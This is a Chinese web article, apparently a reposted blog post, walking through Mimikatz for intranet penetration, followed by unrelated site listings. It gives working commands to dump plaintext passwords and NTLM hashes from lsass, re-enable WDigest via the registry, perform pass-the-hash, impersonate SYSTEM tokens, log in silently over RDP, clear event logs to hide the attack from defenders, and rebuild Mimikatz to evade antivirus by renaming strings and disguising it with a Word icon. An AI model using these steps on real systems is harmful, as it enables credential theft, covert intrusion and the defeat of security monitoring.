360病毒库升级包,内网渗透的基本原理

0x01 工具介绍工具原理Mimikatz 的主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码。常见问题在 Windows Vista 系统之后不再存储 LM HASH,而 Windows 8.1 系统之后内存中也不再存储明文密码,因此在高版本 Windows 系统中无法利用 Mimikatz 直接读取明文密码。Mimikatz 能获取明文密码的关键是 wdigest,这是一个可逆算法,相关注册表存储位置如下:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)后续高版本的 Windows 系统不能读取明文是因为关闭了该注册表键,如果想要重新获取明文,只需要开启该注册表后再输入密码重新登录即可。

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1给小伙伴整理了相对应的学习资料,如果你需要的话,我也可以分享一部分出来(涉密部分分享不了),需要的可以

【一帮助网络安全学习一】关注我,私信回复“资料”免费领取256G网络安全自学资料0x02 基础使用常见用法Mimikatz 的启动需要管理员/SYSTEM权限运行,默认情况下拥有 32 位以及 64 位版本,在 Kali Linux 中默认存放位置为/usr/share/mimikatz,大多数人使用 Mimikatz 一般只用到两个命令,而对其他命令不太了解,接下来会为大家全面介绍 Mimikatz 这款神器。

privilege::debugsekurlsa::logonpasswords也可以使用一句话输出保存

mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonpasswords” “exit”> pssword.txt基本语法使用命令可查看全部功能模块

::

调试进程修改运行权限为SYSTEM

privilege::debugprivilege:: #查看 privilege 的运行模块

开启日志记录,保存读取的用户凭证信息

standard::log

0x03 常用模块Crypto模块加密模块主要用于导出可导出的证书,利用 CryptoAPI 函数访问证书,相当于简化版的 certutil。有时候一张合法的证书非常有用,当利用合法证书生成木马程序时可能被杀软认做白名单程序从而不进行查杀。相关参数如下:

/provider #指定提供者/providertype #指定提供类型/cngprovider #CNG提供者/export #导出密钥 PVK 文件

查看相关密钥的提供者

crypto::providers

 

查看当前系统存储信息

crypto::stores

 

常见的系统存储用户名包括:CURRENT_USERUSER_GROUP_POLICYLOCAL_MACHINELOCAL_MACHINE_GROUPLOCAL_MACHINE_ENTERPRISECURRENT_SERVICEUSERSSERVICES指定系统存储为local_machine进行查看

crypto::stores /systemstore:local_machine

 

查看用户当前证书

crypto::certificates

导出 ROOT 根证书

crypto::certificates /store:Root

 

导出证书必须配合 store 参数。其中公钥为DER,私钥为PFX,密码为 mimikatz

crypto::certificates /store:Root /export

 

使用 CryptoAPI 打补丁,有时候证书无法导出可能就是补丁没有打

crypto::capi

使用 CNG 打补丁,用于导出未标记可导出的证书

crypto::cng

列出智能读卡器,可能会出现报错

crypto::sc

查看相关密钥

crypto::key

 

使用 OpenSSL 生成证书

openssl rsa -inform pvk -in key.pvk -outform pem -out key.pemSekurlsa模块Sekurlsa 模块能从lsass.exe进程中提取 passwords、keys、pin、tickets 等用户凭据信息,是最常用到模块。查看所有身份认证信息,成功拿到用户明文密码

sekurlsa::logonpasswords

 

查看用户哈希可能会出现报错,这主要是由于当前权限较低

lsadump::sam

解决方法非常简单,只要以系统权限运行即可

process::runp在新窗口中再次运行可成功拿到哈希

重置用户 NTLM 哈希会把哈希直接写入 SAM 数据库当中,因此执行该操作相当于重置密码,再次登录需要使用新密码进行登录

lsadump::setntlm /user:admin /ntlm:b2781ba85ac750ec286744b009599637

 

转储并导出lsass.exe进程

sekurlsa::minidump lsass.tmp通过哈希传递进行横向移动

sekurlsa::pth /user:admin /domain:host1 /ntlm:b2781ba85ac750ec286744b009599637sekurlsa::pth /user:admin /domain:host1 /aes256:b2781ba85ac750ec286744b009599637凭证管理器中可查看 Windows 凭证

Token模块Token 模块主要用于查看、假冒现有 token。查看当前 token 信息

token::whoami

查看 token 列表并假冒系统管理员

token::listtoken::elevate /NT AUTHORITY\SYSTEM

 

还原假冒进程

token::revert

其他模块一般情况下重复登录远程桌面会导致已登录用户会直接退出或提示有其他用户登录

 

配合命令无提示登录远程桌面,该功能在 HW 中非常好用,即使管理员处于登录状态,我们仍能悄悄登录其他用户

ts::multirdp

成功登录原会话不受影响,使用命令查看会话列表

ts::sessions

 

虽然目前不会被已登录用户发现,但在事件查看器当中仍会存在登录日志

 

使用命令一键清除日志

event::clear

成功清除日志后蓝队工程师无法通过系统日志来还原攻击过程

 

安装/卸载 Mimikatz 服务,帮助我们监听用户输入

service::+service::-

成功安装 Mimikatz 服务且已自动启动

 

比如监听粘贴文本

misc::clip

0x04 免杀利用Mimikatz 作为最常用的黑客工具早已被各大安全软件标记,比如360杀毒、360安全卫士、卡巴斯基等。使用源码免杀能帮助我们绕过杀毒软件的查杀,这是一种基于特征码的免杀方式,只需定位到源码中的特征代码进行修改就可达到免杀效果,一般会定位三个位置,分别是代码、字符串和输入表。准备环境在免杀前需要准备以下三个要素:Mimikatz 源码Visual Stdio 2019(C++)vc依赖文件在 Github 中下载最新版的 Mimikatz

下载地址:https://github.com/gentilkiwi/mimikatz

 

更新 360 杀毒、病毒库为最新版本

配置问题点击 Mimikatz 中的启动文件启动 Visual Stdio,在帮助菜单》关于〉查看许可证状态中输入激活证书可成功激活。而在 VS 2012 中如果出现报错信息(error MSB8020),解决方法为进入项目》属性〉常规》平台工作集中,将平台改为 VS 2012(v110)后即可成功运行编译。

 

选择生成出现报错界面,点击工具》获取工具和功能〉C++ 进行桌面开发》C++ Windows XP Support for VS 2017 v141,点击修改即可解决问题

 

下载安装完成后修改手工工具集为 2017 版本

 

在配置属性中的 C++ 中修改将警告视为错误改为否,否则每当出现错误就无法编译

重新生成又出现报错:MSB8036

在项目属性页选择已安装的 SDK 版本

点击重新生成后成功编译 32 位 Mimikatz

 

如果需要生成 64 位程序可在解决方案》配置属性选择平台为x64

点击重新生成成功编译 64 位 Mimikatz

免杀过程步入正题选择项目 mimikatz 的编辑》查找和替换》在文件中替换

把关键字 mimikatz 所有的字符串替换为 macsec,点击全部替换即可

由于字符串全部被替换,导致引入 mimikatz 的文件名也被替换,因此需修改全部文件名为 macsec

点击重新生成后输出macsec.exe

虽然目前能够进行静态查杀,但是还是无法绕过动态查杀

 

进一步删除macsec.c和macsec.h的注释信息

再次重新生成程序使用360测试仍无法绕过动态查杀

 

在macsec.rc中修改版本信息,把带有 gentilkiwi 的公司名修改为 macsec

 

修改图标macsec.ico为 Office Word 图标后再次点击生成

放入免杀环境再次运行即可成功绕过

当然命令也能够成功执行

 

完成免杀后可上传至云平台查杀测试,但一般不要这么做,云平台会标记免杀程序

本站部分内容由互联网用户自发贡献,该文观点仅代表作者本人,本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。

如发现本站有涉嫌抄袭侵权/违法违规等内容,请联系我们举报!一经查实,本站将立刻删除。

(0)

相关推荐

  • 彩球消消看游戏玩法介绍,益智游戏消消乐消泡泡

    一个类似气泡消消乐的VC 游戏源码,这里是消灭彩球,玩法有点像消消乐,编译游戏源码时需要LibUIDK控件,控制主要是用来生成界面图形的,skins在bin目录下,请记得编译后的文件也要在这个文件下。游戏自带音效资源,用到的资源文件比较完整,源代码在VC6.0下编译,记得控件要准备好。 项目源代码: 部分代码: 程序运行截图: 如果您想学C/C 编程,这里有…

    2023-06-20 用户投稿
  • 手游代理如何吸引玩家?

    代理手游之后,如何吸引玩家一直是一个大难题。 手游代理的主要收益就是玩家在游戏里的充值消费,而在游戏里充值对于玩家来说也是能接受的,热门爆火的游戏,也是依靠着玩家的消费,才能运营下去。 我们希望玩家能不断地充值消费,为我们带来更多的收益,同时也担心,玩家对明显的骗氪活动,不氪就不能变强,变相的逼着玩家氪金,让玩家产出反感,这样的游戏肯定不会太长,从而导致大量…

    用户投稿 2022-06-09
  • esl one 云顶,云顶toc2总决赛

    北京时间1月26日,ESL ONE云顶2018主赛事第一天结束了全部赛程。Newbee以及EG分别以2-0的比分击败各自的对手晋级四强,EG更是保持了从2015年开始线下赛不败VP的传统。 比赛固然精彩,另一边官方放出了选手采访的片段,在采访到LFY.剑来时,剑来表示来这次ESL ONE主要是队伍的磨合,并透露LFY队内暴露的一些问题:打完TI之后动力不足,…

    2023-06-26
  • 火星文英文转换器(火星文转换器字体在线转换)

    身价65亿、开跑车的80后,和他无处安放的焦虑。 文 / 华商韬略 李延磊 两年前的冬天,吴欣鸿携老乡蔡文胜和Angelababy在香港敲响上市钟声。上市当天,吴欣鸿说,每一天都满是焦虑感,每一天都害怕被颠覆,这种焦虑让他夜难入梦。 【“妖术”的诞生】 2008年,时年27岁的吴欣鸿已经创业7年。这枚曾经的艺术少年无比渴望证明自己,却在创业路上屡战屡败。 高…

    2023-05-28 用户投稿
  • dnf反和谐补丁,碧蓝航线反和谐补丁

    【剑魂渐变技能】 剑魂拥有2款渐变技能,一种是黄红渐变,一种是蓝紫渐变。两者差别不是很大,喜欢那个就用那个。 【红眼反和谐/渐变】 原本红眼的”石油”技能让玩家特别难受,那么一款反和谐补丁就成了人手必备。另外在此基础上,还开发出紫黑渐变技能。 【黑武/剑影鬼灭之刃】 将鬼灭之刃的技能转移到DNF上,而且还原度很高,真是动漫迷的福利。不…

    2023-07-09
  • 男主土匪的古言小说(糙汉古言小说推荐)

    本期分享4本土匪男主文,他五大三粗,面黑心黑,只想把她撩到怀里来! 一、《嫁给一个土匪》 作者:归绯 短评:女主温婉乖巧嫡长女,但却在家倍受冷落,女主的亲娘为了名声,狠心将女主角寄养在老家,自己则精心照料着女主角的堂妹,因为是女主角堂妹的爹是战死沙场的大将军,她要维持自己贤良大度的体面。女主角长大以后回京,她娘还告诫她不要与堂妹争。女主角委屈但还是接受。但堂…

    2023-06-02 用户投稿
  • 碘酊是什么,酒精,双氧水,红汞,碘伏哪个消毒好

      酒精、碘酒、碘伏、双氧水、红汞水、紫药水哪个好?酒精     医院里用于消毒的酒精一般是75%浓度的乙醇,浓度过高或者过低,都会降低酒精的杀菌效果。 酒精的杀菌消毒效果还是可观的,但是它的缺点也很明显:刺激性大。酒精接触到伤口后,我们会感觉到非常疼痛,除了我们能感受到的疼痛之外,酒精对粘膜、皮肤细胞等也存在不良刺激。 所以酒…

    2023-06-23 用户投稿
  • 亚洲选美 谁将获得亚洲选美冠军

    本文编辑剧透社:issac 未经授权严禁转载,发现抄袭者将进行全网投诉 一年一度的香港又一大选美盛事——2021年亚洲小姐竞选已经在香港大埔亚洲电视台圆满落下帷幕。 目前比赛的结果已经全部出炉,最终11号参赛佳丽陈美仪,在决赛中凭借比较稳定的发挥爆冷夺得冠军,同时她还获得了最完美体态大奖。 而赛前最大热门、4号佳丽袁群有则遗憾屈居第二名,获得亚军。季军则由1…

    用户投稿 2023-06-02
  • 什么叫无线网卡,随身wifi好用还是无线网卡好用

    如今,随着互联网的普及和移动设备的广泛使用,人们对于便捷的网络接入方式的需求不断增加。其中,随身WiFi成为了越来越多人的选择。相比手机热点,随身WiFi可以为电脑、平板等多个设备提供稳定的网络信号,而且不需要借助手机或路由器等其他设备。但是,在购买随身WiFi之前,很多人会对它和无线网卡产生混淆,不知道该如何选择。 我们先来了解一下它们的工作原理:无线网卡…

    2023-07-01
  • 显示器对比度(显示屏的对比度多少合适)

    由于早期的液晶显示器因为画面显示不理想,所以对不同的显示特性做了比较具体的规范和量标准,其中画面的对比度是指画面中区域最亮和最暗的亮度对比,这也作为显示器的有效数据被广大用户所看重。 购买之时需谨慎 如何一秒识破对比度骗局? 目前,我们所熟知的对比度分为两种,一种是静态对比度,一种是动态对比度。相比较动态对比度,静态对比度的数值更具参考价值。但自从商家们开始…

    2023-07-06 用户投稿
  • 如何深度思考?,深度思考的5个方法,让你变的与众不同

    我曾经在直播间分享了一个超级有价值的话题:如何深度思考? 在直播中,我用了半小时,分享了5个深度思考的方法 方法一:用笔记录思考的过程 如果只用脑子思考,思考的时候很深入,但是过一段就容易忘记,同样还有一些人喜欢说出来,同样是说的时候很爽,但是没有记录很快就会忘记。 所以,想要深度思考,第一个方法就是要用笔来记录自己的思考过程,最好边思考,边记录。 这样的好…

    用户投稿 2022-10-23
  • 看广告挣钱app一次多少钱(看广告赚话费)

    对于在家妈宝、休闲上班族、寻找兼职的朋友们应该或多或少都有想过用手机兼职赚钱的想法,盲目地下载视频广告里的各种赚钱app,更有甚者很多朋友都被骗过,各种虚假广告得不偿失。 我自己最开始的时候也就只有抖音一个休闲软件,当然那时候不是为了刷金币赚钱,只是闲来无事的时候打发时间。直到有一天看到一个老铁的看文章刷金币分享视频,那时候就开始心动了。考虑到自己白天上班时…

    用户投稿 2021-10-29